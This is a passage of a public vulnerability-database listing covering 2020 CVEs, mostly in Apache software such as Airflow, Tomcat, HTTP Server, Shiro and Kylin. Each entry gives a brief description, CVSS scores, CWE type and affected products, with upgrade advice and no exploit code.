oracle retail_financial_integration 14.1.3
oracle retail_service_backbone 14.1.3
oracle retail_xstore_point_of_service 16.0.6
oracle retail_advanced_inventory_planning 14.1
oracle retail_assortment_planning 16.0.3
oracle storagetek_tape_analytics 2.4
oracle primavera_unifier 18.8
oracle retail_xstore_point_of_service 17.0.4
oracle primavera_unifier 16.1
gradle gradle *
oracle retail_eftlink 20.0.0
oracle retail_predictive_application_server 14.1
oracle retail_financial_integration 16.0.3
oracle retail_store_inventory_management 14.1.3.9
oracle primavera_unifier 19.12
oracle retail_xstore_point_of_service 15.0.4
oracle banking_treasury_management 14.4
oracle banking_platform 2.6.2
oracle retail_merchandise_financial_planning 16.0.3
oracle retail_financial_integration 15.0.3
oracle retail_regular_price_optimization 16.0.3
oracle banking_platform 2.7.1
oracle flexcube_private_banking 12.1.0
oracle utilities_framework 4.4.0.2.0
oracle retail_macro_space_optimization 16.0.3
oracle retail_merchandising_system 14.1.3.2
oracle enterprise_repository 11.1.1.7.0
oracle banking_platform 2.7.0
oracle storagetek_acsls 8.5.1
oracle timesten_in-memory_database *
oracle retail_service_backbone 16.0.3
oracle financial_services_analytical_applications_infrastructure *
oracle retail_store_inventory_management 15.0.3.0
oracle retail_category_management_planning_&_optimization 16.0.3
oracle communications_unified_inventory_management 7.4.1
fedoraproject fedora 32
oracle primavera_unifier 16.2
oracle retail_store_inventory_management 16.0.3.0
oracle retail_replenishment_optimization 16.0.3
oracle flexcube_private_banking 12.0.0
oracle retail_integration_bus 15.0.3
oracle utilities_framework 4.3.0.6.0
oracle real-time_decision_server 11.1.1.9.0
oracle primavera_unifier 20.12
oracle retail_xstore_point_of_service 19.0.2
apache ant 1.10.8
fedoraproject fedora 31
oracle banking_platform 2.8.0
oracle data_integrator 12.2.1.3.0
oracle retail_size_profile_optimization 16.0.3
oracle banking_platform 2.4.0
oracle financial_services_analytical_applications_infrastructure 8.1.1
fedoraproject fedora 33
CVE-2020-11980 MEDIUM

In Karaf, JMX authentication takes place using JAAS and authorization takes place using ACL files. By default, only an "admin" can actually invoke on an MBean. However, there is a vulnerability for someone who is not an admin but has a "viewer" role. In 'etc/jmx.acl.cfg', such a role can call get*. It is possible to authenticate with the viewer role and invoke the MLet getMBeansFromURL method, which goes off to a remote server to fetch the desired MBean, which is then registered in Karaf. At this point the attack fails, as "viewer" does not have permission to invoke on the MBean. Still, it could act as an SSRF-style attack, and it essentially allows a "viewer" role to pollute the MBean registry, which is a kind of privilege escalation. The severity is low, as it is possible to add an ACL to limit access. Users should update to Apache Karaf 4.2.9 or newer.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L 2.8 3.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-918,

Products Affected

Vendor Product Version
apache karaf *
CVE-2020-11981 HIGH

An issue was found in Apache Airflow versions 1.10.10 and below. When using CeleryExecutor, if an attacker can connect to the broker (Redis, RabbitMQ) directly, it is possible to inject commands, resulting in the celery worker running arbitrary commands.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-78,

Products Affected

Vendor Product Version
apache airflow *
CVE-2020-11982 HIGH

An issue was found in Apache Airflow versions 1.10.10 and below. When using CeleryExecutor, if an attacker can connect to the broker (Redis, RabbitMQ) directly, it was possible to insert a malicious payload directly into the broker, which could lead to a deserialization attack (and thus remote code execution) on the Worker.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache airflow *
CVE-2020-11983 LOW

An issue was found in Apache Airflow versions 1.10.10 and below. It was discovered that many of the admin management screens in the new/RBAC UI handled escaping incorrectly, allowing authenticated users with appropriate permissions to create stored XSS attacks.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N 2.3 2.7

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache airflow *
CVE-2020-11984 HIGH

Apache HTTP server 2.4.32 to 2.4.44 mod_proxy_uwsgi info disclosure and possible RCE

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-120,

Products Affected

Vendor Product Version
apache http_server *
oracle communications_session_route_manager *
canonical ubuntu_linux 18.04
oracle hyperion_infrastructure_technology 11.1.2.4
debian debian_linux 9.0
opensuse leap 15.1
opensuse leap 15.2
oracle instantis_enterprisetrack 17.1
debian debian_linux 10.0
oracle enterprise_manager_ops_center 12.4.0.0
netapp clustered_data_ontap -
oracle communications_session_report_manager *
fedoraproject fedora 32
canonical ubuntu_linux 16.04
fedoraproject fedora 31
canonical ubuntu_linux 20.04
oracle zfs_storage_appliance_kit 8.8
oracle instantis_enterprisetrack 17.2
oracle instantis_enterprisetrack 17.3
oracle communications_element_manager *
CVE-2020-11985 MEDIUM

IP address spoofing when proxying using mod_remoteip and mod_rewrite. For configurations using proxying with mod_remoteip and certain mod_rewrite rules, an attacker could spoof their IP address for logging and PHP scripts. Note this issue was fixed in Apache HTTP Server 2.4.24 but was retrospectively allocated a low severity CVE in 2020.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-345,

Products Affected

Vendor Product Version
apache http_server *
CVE-2020-11986 HIGH

To be able to analyze gradle projects, the build scripts need to be executed. Apache NetBeans follows this pattern. This causes the code of the build script to be invoked at load time of the project. Apache NetBeans up to and including 12.0 did not request consent from the user for the analysis of the project at load time. This in turn will run potentially malicious code, from an external source, without the consent of the user.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache netbeans *
CVE-2020-11987 MEDIUM

Apache Batik 1.13 is vulnerable to server-side request forgery, caused by improper input validation by the NodePickerPanel. By using a specially-crafted argument, an attacker could exploit this vulnerability to cause the underlying server to make arbitrary GET requests.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.2 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N 3.9 4.2

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,CWE-918,

Products Affected

Vendor Product Version
oracle communications_application_session_controller 3.9m0p3
oracle communications_metasolv_solution 6.3.0
oracle communications_metasolv_solution 6.3.1
apache batik *
oracle enterprise_repository 11.1.1.7.0
oracle banking_apis 21.1
oracle instantis_enterprisetrack 17.1
oracle flexcube_universal_banking *
oracle agile_engineering_data_management 6.2.1.0
debian debian_linux 10.0
oracle retail_central_office 14.1
fedoraproject fedora 34
oracle banking_digital_experience 20.1
oracle banking_digital_experience 18.3
oracle instantis_enterprisetrack 17.3
oracle banking_digital_experience 19.1
oracle weblogic_server 12.2.1.4.0
oracle product_lifecycle_analytics 3.6.1
oracle weblogic_server 12.2.1.3.0
oracle retail_order_broker 15.0
oracle banking_digital_experience 21.1
oracle retail_order_management_system_cloud_service 19.5
oracle insurance_policy_administration *
oracle retail_returns_management 14.1
oracle retail_order_broker 16.0
oracle banking_digital_experience 19.2
oracle communications_offline_mediation_controller 12.0.0.3.0
oracle banking_apis 19.1
oracle retail_point-of-service 14.1
oracle banking_apis 19.2
oracle fusion_middleware_mapviewer 12.2.1.4.0
oracle weblogic_server 14.1.1.0.0
oracle instantis_enterprisetrack 17.2
oracle retail_back_office 14.1
oracle banking_apis 18.3
fedoraproject fedora 33
oracle banking_apis 20.1
CVE-2020-11988 MEDIUM

Apache XmlGraphics Commons 2.4 and earlier is vulnerable to server-side request forgery, caused by improper input validation by the XMPParser. By using a specially-crafted argument, an attacker could exploit this vulnerability to cause the underlying server to make arbitrary GET requests. Users should upgrade to 2.6 or later.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.2 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N 3.9 4.2

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,CWE-918,

Products Affected

Vendor Product Version
fedoraproject fedora 34
apache xmlgraphics_commons *
fedoraproject fedora 33
CVE-2020-11989 HIGH

In Apache Shiro before 1.5.3, when using Apache Shiro with Spring dynamic controllers, a specially crafted request may cause an authentication bypass.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache shiro *
CVE-2020-11990 LOW

We have resolved a security issue in the camera plugin that could have affected certain Cordova (Android) applications. An attacker who could install (or lead the victim to install) a specially crafted (or malicious) Android application would be able to access pictures taken with the app externally.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 3.3 LOW CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 1.8 1.4

CVSS 2.0

Severity: LOW

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache cordova 4.1.0
CVE-2020-11991 MEDIUM

When using the StreamGenerator, the code parses user-provided XML. A specially crafted XML document, including external system entities, could be used to access any file on the server system.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache cocoon *
CVE-2020-11993 MEDIUM

Apache HTTP Server versions 2.4.20 to 2.4.43. When trace/debug was enabled for the HTTP/2 module and on certain traffic edge patterns, logging statements were made on the wrong connection, causing concurrent use of memory pools. Configuring the LogLevel of mod_http2 above "info" will mitigate this vulnerability for unpatched servers.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-444,

Products Affected

Vendor Product Version
apache http_server *
oracle communications_session_route_manager *
canonical ubuntu_linux 18.04
oracle hyperion_infrastructure_technology 11.1.2.4
opensuse leap 15.1
opensuse leap 15.2
oracle instantis_enterprisetrack 17.1
debian debian_linux 10.0
oracle enterprise_manager_ops_center 12.4.0.0
netapp clustered_data_ontap -
oracle communications_session_report_manager *
fedoraproject fedora 32
canonical ubuntu_linux 16.04
fedoraproject fedora 31
canonical ubuntu_linux 20.04
oracle zfs_storage_appliance_kit 8.8
oracle instantis_enterprisetrack 17.2
oracle instantis_enterprisetrack 17.3
oracle communications_element_manager *
CVE-2020-11994 MEDIUM

Server-Side Template Injection and arbitrary file disclosure on Camel templating components

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-74,

Products Affected

Vendor Product Version
apache camel 2.25.1
oracle enterprise_repository 11.1.1.7.0
oracle enterprise_manager_base_platform 13.4.0.0
apache camel *
oracle communications_diameter_signaling_router *
apache camel 2.25.0
CVE-2020-11995 HIGH

A deserialization vulnerability existed in Dubbo 2.7.5 and its earlier versions, which could lead to malicious code execution. Most Dubbo users use Hessian2 as the default serialization/deserialization protocol. While Hessian2 deserializes a HashMap object, some functions in the classes stored in the HashMap are executed after a series of program calls, and those special functions may cause remote command execution. For example, the hashCode() function of the EqualsBean class in rome-1.7.0.jar can be made to remotely load malicious classes and execute malicious code by constructing a malicious request. This issue was fixed in Apache Dubbo 2.6.9 and 2.7.8.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache dubbo *
CVE-2020-11996 MEDIUM

A specially crafted sequence of HTTP/2 requests sent to Apache Tomcat 10.0.0-M1 to 10.0.0-M5, 9.0.0.M1 to 9.0.35 and 8.5.0 to 8.5.55 could trigger high CPU usage for several seconds. If a sufficient number of such requests were made on concurrent HTTP/2 connections, the server could become unresponsive.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
oracle siebel_ui_framework *
debian debian_linux 9.0
opensuse leap 15.1
opensuse leap 15.2
oracle workload_manager 18c
apache tomcat 10.0.0
debian debian_linux 10.0
oracle workload_manager 19c
netapp oncommand_system_manager 3.1.3
oracle workload_manager 12.2.0.1
apache tomcat *
canonical ubuntu_linux 20.04
apache tomcat 9.0.0
oracle mysql_enterprise_monitor *
netapp oncommand_system_manager 3.0
CVE-2020-11997 MEDIUM

Apache Guacamole 1.2.0 and earlier do not consistently restrict access to connection history based on user visibility. If multiple users share access to the same connection, those users may be able to see which other users have accessed that connection, as well as the IP addresses from which that connection was accessed, even if those users do not otherwise have permission to see other users.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-276,

Products Affected

Vendor Product Version
apache guacamole *
CVE-2020-11998 HIGH

A regression has been introduced in the commit preventing JMX re-bind. By passing an empty environment map to RMIConnectorServer, instead of the map that contains the authentication credentials, it leaves ActiveMQ open to the following attack: https://docs.oracle.com/javase/8/docs/technotes/guides/management/agent.html "A remote client could create a javax.management.loading.MLet MBean and use it to create new MBeans from arbitrary URLs, at least if there is no security manager. In other words, a rogue remote client could make your Java application execute arbitrary code." Mitigation: Upgrade to Apache ActiveMQ 5.15.13

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
oracle communications_session_report_manager *
oracle communications_session_route_manager *
oracle enterprise_repository 11.1.1.7.0
oracle flexcube_private_banking 12.0.0
oracle communications_diameter_signaling_router *
apache activemq 5.15.12
oracle communications_element_manager *
oracle flexcube_private_banking 12.1.0
CVE-2020-13920 MEDIUM

Apache ActiveMQ uses LocateRegistry.createRegistry() to create the JMX RMI registry and binds the server to the "jmxrmi" entry. It is possible to connect to the registry without authentication and call the rebind method to rebind jmxrmi to something else. If an attacker creates another server to proxy the original and binds that, they effectively become a man in the middle and are able to intercept the credentials when a user connects. Upgrade to Apache ActiveMQ 5.15.12.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N 2.2 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-306,

Products Affected

Vendor Product Version
apache activemq *
debian debian_linux 9.0
oracle flexcube_private_banking 12.0.0
oracle communications_diameter_signaling_router *
oracle flexcube_private_banking 12.1.0
CVE-2020-13921 HIGH

**Resolved** Only when using H2/MySQL/TiDB as Apache SkyWalking storage, there is a SQL injection vulnerability in the wildcard query cases.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-89,

Products Affected

Vendor Product Version
apache skywalking 6.6.0
apache skywalking 7.0.0
apache skywalking 8.0.1
apache skywalking 6.5.0
apache skywalking 8.0.0
CVE-2020-13922 MEDIUM

Versions of Apache DolphinScheduler prior to 1.3.2 allowed an ordinary user under any tenant to override another user's password through the API interface.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,CWE-276,

Products Affected

Vendor Product Version
apache dolphinscheduler 1.3.1
apache dolphinscheduler 1.2.0
apache dolphinscheduler 1.2.1
CVE-2020-13923 MEDIUM

IDOR vulnerability in the order processing feature of the ecommerce component of Apache OFBiz before 17.12.04.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-639,

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2020-13924 MEDIUM

In Apache Ambari versions 2.6.2.2 and earlier, malicious users can construct file names for directory traversal and traverse to other directories to download files.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache ambari *
CVE-2020-13925 HIGH

Similar to CVE-2020-1956, Kylin has one more RESTful API which concatenates the API inputs into OS commands and then executes them on the server; the reported API lacks the necessary input validation, which gives attackers the possibility to execute OS commands remotely. Users of all previous versions after 2.3 should upgrade to 3.1.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-78,

Products Affected

Vendor Product Version
apache kylin *
CVE-2020-13926 HIGH

Kylin concatenates and executes a Hive SQL statement in Hive CLI or beeline when building a new segment; some part of the HQL comes from system configuration, and that configuration can be overwritten by a certain REST API, which makes a SQL injection attack possible. Users of all previous versions after 2.0 should upgrade to 3.1.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-89,

Products Affected

Vendor Product Version
apache kylin *
CVE-2020-13927 HIGH

The previous default setting for Airflow's Experimental API was to allow all API requests without authentication, but this poses security risks to users who miss this fact. From Airflow 1.10.11 the default has been changed to deny all requests by default and is documented at https://airflow.apache.org/docs/1.10.11/security.html#api-authentication. Note this change fixes it for new installs but existing users need to change their config to default `[api]auth_backend = airflow.api.auth.backend.deny_all` as mentioned in the Updating Guide: https://github.com/apache/airflow/blob/1.10.11/UPDATING.md#experimental-api-will-deny-all-request-by-default

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-306,CWE-1188,CWE-1056,

Products Affected

Vendor Product Version
apache airflow *
CVE-2020-13928 MEDIUM

Apache Atlas before 2.1.0 contains an XSS vulnerability. While saving a search or rendering elements, values are not sanitized correctly, which triggers the XSS vulnerability.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache atlas *
CVE-2020-13929 MEDIUM

Authentication bypass vulnerability in Apache Zeppelin allows an attacker to bypass the Zeppelin authentication mechanism to act as another user. This issue affects Apache Zeppelin version 0.9.0 and prior versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache zeppelin *
CVE-2020-13931 MEDIUM

If Apache TomEE 8.0.0-M1 - 8.0.3, 7.1.0 - 7.1.3, 7.0.0-M1 - 7.0.8, 1.0.0 - 1.7.5 is configured to use the embedded ActiveMQ broker, and the broker config is misconfigured, a JMX port is opened on TCP port 1099, which does not include authentication. CVE-2020-11969 previously addressed the creation of the JMX management interface, however the incomplete fix did not cover this edge case.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache tomee *
apache tomee 7.0.0
apache tomee 8.0.0
CVE-2020-13932 MEDIUM

In Apache ActiveMQ Artemis 2.5.0 to 2.13.0, a specially crafted MQTT packet which has an XSS payload as the client-id or topic name can exploit this vulnerability. The XSS payload is injected into the admin console's browser. The XSS payload is triggered in the diagram plugin, the queue node and the info section.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache activemq_artemis *
CVE-2020-13933 MEDIUM

In Apache Shiro before 1.6.0, a specially crafted HTTP request may cause an authentication bypass.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
debian debian_linux 9.0
apache shiro *
CVE-2020-13934 MEDIUM

An h2c direct connection to Apache Tomcat 10.0.0-M1 to 10.0.0-M6, 9.0.0.M5 to 9.0.36 and 8.5.1 to 8.5.56 did not release the HTTP/1.1 processor after the upgrade to HTTP/2. If a sufficient number of such requests were made, an OutOfMemoryException could occur leading to a denial of service.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-401,CWE-476,

Products Affected

Vendor Product Version
opensuse leap 15.1
oracle instantis_enterprisetrack 17.1
oracle workload_manager 18c
apache tomcat 10.0.0
oracle agile_engineering_data_management 6.2.1.0
debian debian_linux 10.0
oracle managed_file_transfer 12.2.1.4.0
oracle communications_instant_messaging_server 10.0.1.5.0
oracle workload_manager 12.2.0.1
apache tomcat *
oracle agile_plm 9.3.3
oracle agile_plm 9.3.5
oracle agile_plm 9.3.6
oracle fmw_platform 12.2.1.4.0
oracle mysql_enterprise_monitor *
oracle instantis_enterprisetrack 17.3
netapp oncommand_system_manager *
oracle siebel_ui_framework *
debian debian_linux 9.0
opensuse leap 15.2
oracle fmw_platform 12.2.1.3.0
oracle workload_manager 19c
oracle managed_file_transfer 12.2.1.3.0
canonical ubuntu_linux 20.04
apache tomcat 9.0.0
oracle instantis_enterprisetrack 17.2
CVE-2020-13935 MEDIUM

The payload length in a WebSocket frame was not correctly validated in Apache Tomcat 10.0.0-M1 to 10.0.0-M6, 9.0.0.M1 to 9.0.36, 8.5.0 to 8.5.56 and 7.0.27 to 7.0.104. Invalid payload lengths could trigger an infinite loop. Multiple requests with invalid payload lengths could lead to a denial of service.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-835,

Products Affected

Vendor Product Version
oracle commerce_guided_search 11.3.2
opensuse leap 15.1
mcafee epolicy_orchestrator 5.9.0
oracle instantis_enterprisetrack 17.1
oracle workload_manager 18c
apache tomcat 10.0.0
oracle agile_engineering_data_management 6.2.1.0
debian debian_linux 10.0
oracle managed_file_transfer 12.2.1.4.0
oracle communications_instant_messaging_server 10.0.1.5.0
oracle workload_manager 12.2.0.1
apache tomcat *
mcafee epolicy_orchestrator 5.9.1
oracle agile_plm 9.3.3
oracle agile_plm 9.3.5
oracle agile_plm 9.3.6
oracle fmw_platform 12.2.1.4.0
oracle mysql_enterprise_monitor *
oracle blockchain_platform *
oracle instantis_enterprisetrack 17.3
netapp oncommand_system_manager *
oracle communications_cloud_native_core_policy 1.14.0
oracle siebel_ui_framework *
mcafee epolicy_orchestrator 5.10.0
debian debian_linux 9.0
opensuse leap 15.2
oracle fmw_platform 12.2.1.3.0
oracle workload_manager 19c
canonical ubuntu_linux 16.04
oracle managed_file_transfer 12.2.1.3.0
canonical ubuntu_linux 20.04
apache tomcat 9.0.0
oracle instantis_enterprisetrack 17.2
CVE-2020-13936 HIGH

An attacker that is able to modify Velocity templates may execute arbitrary Java code or run arbitrary system commands with the same privileges as the account running the Servlet container. This applies to applications that allow untrusted users to upload/modify velocity templates running Apache Velocity Engine versions up to 2.2.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache velocity_engine *
oracle banking_enterprise_default_management 2.6.2
oracle banking_enterprise_default_management 2.7.1
oracle banking_party_management 2.7.0
oracle retail_xstore_office_cloud_service 20.0.1
oracle utilities_testing_accelerator 6.0.0.2.2
oracle retail_xstore_office_cloud_service 17.0.4
oracle retail_service_backbone 19.0.1
oracle communications_cloud_native_core_policy 1.14.0
oracle retail_xstore_office_cloud_service 19.0.2
oracle communications_network_integrity 7.3.6
debian debian_linux 9.0
oracle banking_platform *
oracle retail_order_broker 16.0
oracle banking_loans_servicing 2.12.0
oracle banking_deposits_and_lines_of_credit_servicing 2.12.0
apache wss4j 2.3.1
oracle banking_enterprise_default_management *
oracle retail_xstore_office_cloud_service 18.0.3
oracle retail_integration_bus 19.0.1
oracle utilities_testing_accelerator 6.0.0.3.1
oracle hospitality_token_proxy_service 19.2
oracle retail_xstore_office_cloud_service 16.0.6
oracle banking_platform 2.6.2
oracle banking_platform 2.7.1
oracle utilities_testing_accelerator 6.0.0.1.1
oracle banking_enterprise_default_management 2.10.0
oracle banking_enterprise_default_management 2.12.0
CVE-2020-13937 MEDIUM

Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed Kylin's configuration information without any authentication, so it is dangerous because some confidential information entries will be disclosed to everyone.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-922,

Products Affected

Vendor Product Version
apache kylin 2.6.2
apache kylin 2.6.0
apache kylin 3.0.0
apache kylin 2.3.0
apache kylin 2.0.0
apache kylin 2.5.2
apache kylin 2.4.0
apache kylin 2.6.4
apache kylin 2.1.0
apache kylin 2.2.0
apache kylin 2.6.5
apache kylin 2.4.1
apache kylin 2.6.6
apache kylin 3.0.1
apache kylin 3.0.2
apache kylin 4.0.0
apache kylin 2.3.2
apache kylin 2.5.0
apache kylin 2.5.1
apache kylin 3.1.0
apache kylin 2.6.1
apache kylin 2.3.1
apache kylin 2.6.3
CVE-2020-13938 LOW

Apache HTTP Server versions 2.4.0 to 2.4.46: unprivileged local users can stop httpd on Windows.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H 1.8 3.6

CVSS 2.0

Severity: LOW

Problem Type: CWE-862,

Products Affected

Vendor Product Version
apache http_server *
netapp cloud_backup -
mcafee epolicy_orchestrator *
mcafee epolicy_orchestrator 5.10.0
